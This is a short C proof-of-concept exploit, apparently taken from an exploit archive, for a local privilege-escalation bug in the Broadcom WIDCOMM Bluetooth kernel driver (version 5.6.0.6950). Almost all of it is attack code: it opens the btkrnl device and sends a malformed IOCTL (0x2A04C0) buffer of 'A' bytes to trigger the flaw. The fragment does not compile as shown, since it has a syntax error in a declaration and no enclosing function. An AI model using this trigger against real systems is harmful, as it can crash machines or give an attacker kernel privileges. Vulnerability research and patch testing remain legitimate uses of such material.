/*
source: https://www.securityfocus.com/bid/56124/info
Broadcom WIDCOMM Bluetooth is prone to a local privilege-escalation vulnerability.
A local attacker may exploit this issue to gain escalated privileges and execute arbitrary code with kernel privileges. Failed exploit attempts may result in a denial-of-service condition.
Broadcom WIDCOMM Bluetooth 5.6.0.6950 is vulnerable; other versions may also be affected.
*/
HANDLE hDevice;
char *inbuff, *outbuff;
DWORD ioctl, len,;
if ( (hDevice = CreateFileA("\\\\.\\btkrnl",
0,
0,
0,
OPEN_EXISTING,
0,
NULL) ) != INVALID_HANDLE_VALUE )
{
printf("Device succesfully opened!\n");
}
else
{
printf("Error: Error opening device \n");
return 0;
}
inbuff = (char*)malloc(0x12000);
if(!inbuff){
printf("malloc failed!\n");
return 0;
}
outbuff = (char*)malloc(0x12000);
if(!outbuff){
printf("malloc failed!\n");
return 0;
}
ioctl = 0x2A04C0;
memset(inbuff, 0x41, 0x70);
DeviceIoControl(hDevice, ioctl, (LPVOID)inbuff, 0x70, (LPVOID)outbuff, 0x70, &len, NULL);